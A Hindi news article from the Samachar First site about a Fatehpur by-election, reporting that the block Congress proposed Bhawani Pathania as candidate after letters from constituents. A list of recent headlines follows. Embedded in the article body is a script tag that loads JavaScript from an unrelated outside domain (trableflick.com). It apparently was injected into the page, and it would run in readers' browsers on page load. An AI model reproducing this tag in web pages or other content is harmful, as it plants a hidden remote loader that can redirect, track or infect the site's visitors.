फतेहपुर: लोगों के सेंटीमेंट्स भवानी पठानिया को चुनाव लड़ने के लिए कर सकते है मजबूर!

<p>फतेहपुर में विधायक सुजान सिंह पठानिया के निधन के बाद उपचुनावों के लिए राजनीतिक सरगर्मियां बढ़ती दिख रही हैं। सुजान सिंह पठानिया कांग्रेस पार्टी से थे ऐसे में कांग्रेस में टिकट के चाहवानो की फेहरिस्त लम्बी है लेकिन फतेहपुर ब्लॉक कांग्रेस ने भवानी सिंह पठानिया का नाम हाई कमान को भेजा है जबकि भवानी पठानिया ने अभी तक चुनाव लड़ने की आधिकारिक घोषणा नहीं की है।</p>

<p>मौजूदा वक़्त में भवानी पठानिया एक निजी कम्पनी के देश से सबसे बड़े ओहदे पर हैं और उनकी मंथली तनख़्वा लाखों में है। अब ऐसे में सवाल यही है कि आखिर लाखों की तनख्वा पाने वाला व्यक्ति राजनीति में कूदेगा या नहीं। जब इस बात की पड़ताल की गई तो सामने आया कि लोगो के सेंटीमेंट्स भवानी को चुनाव लड़ने के लिए मजबूर कर सकते हैं क्योंकि सुजान सिंह पठानिया के निधन के बाद से ही विधानसभा के कौने-कौने से भवानी को चिट्टियां प्राप्त हो रही हैं।</p>

<p>इनमें लोगों ने सुजान सिंह पठानिया का हवाला देते हुए ओर उनके जनता से सम्बन्धों की दुहाई और जनता में उनके प्यार की बात कहते&nbsp; हुए चुनाव लड़ने का आग्रह किया है। इन्हीं खतों को आधार बनाके ही ब्लॉक कांग्रेस ने भवानी पठानिया का नाम आगे किया है ।</p>

<p><img src=”/media/gallery/images/image(8466).jpeg” style=”height:570px; width:341px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

केजरीवाल ने Rss Chief को पत्र, केंद्रीय एजेंसियों के दुरुपयोग के आरोप

  New Delhi: आम आदमी पार्टी (AAP) के राष्ट्रीय संयोजक अरविंद केजरीवाल ने राष्ट्रीय स्वयंसेवक…

18 mins ago

कृषि कानून के बयान पर कंगना रनौत ने मानी गलती

  Mandi: मंडी की सांसद और अभिनेत्री कंगना रनौत ने कृषि कानून पर दिए गए…

33 mins ago

कृषि कानून पर बयान देने पर कंगना रनौत ने किसानों से मांगी माफी , अपने शब्द लिए वापस

Mandi: मंडी की सांसद और अभिनेत्री कंगना रनौत ने कृषि कानून पर दिए गए बयान…

39 mins ago

न्यायाधीश राजीव शकधर ने हिमाचल प्रदेश हाईकोर्ट के मुख्य न्यायाधीश के पद की शपथ ली

Shimla: दिल्ली हाईकोर्ट के न्यायाधीश राजीव शकधर ने  आज  हिमाचल प्रदेश हाईकोर्ट के मुख्य न्यायाधीश…

1 hour ago

विदेशी पैराग्‍लाइडरस के बिना बीड बिलिंग सूनी, अब दो अक्‍तूबर से आस

  मौसम की बेरुखी के चलते विदेशी पायलटों ने नहीं दी दस्‍तक रोजाना मात्र 40…

1 hour ago

जानें, कैसा रहेगा आपके लिए आज का दिन

आज का राशिफल दिनांक: 25 सितम्बर 2024 मेष (Aries): आज आपको नई जिम्मेदारियां मिल सकती…

2 hours ago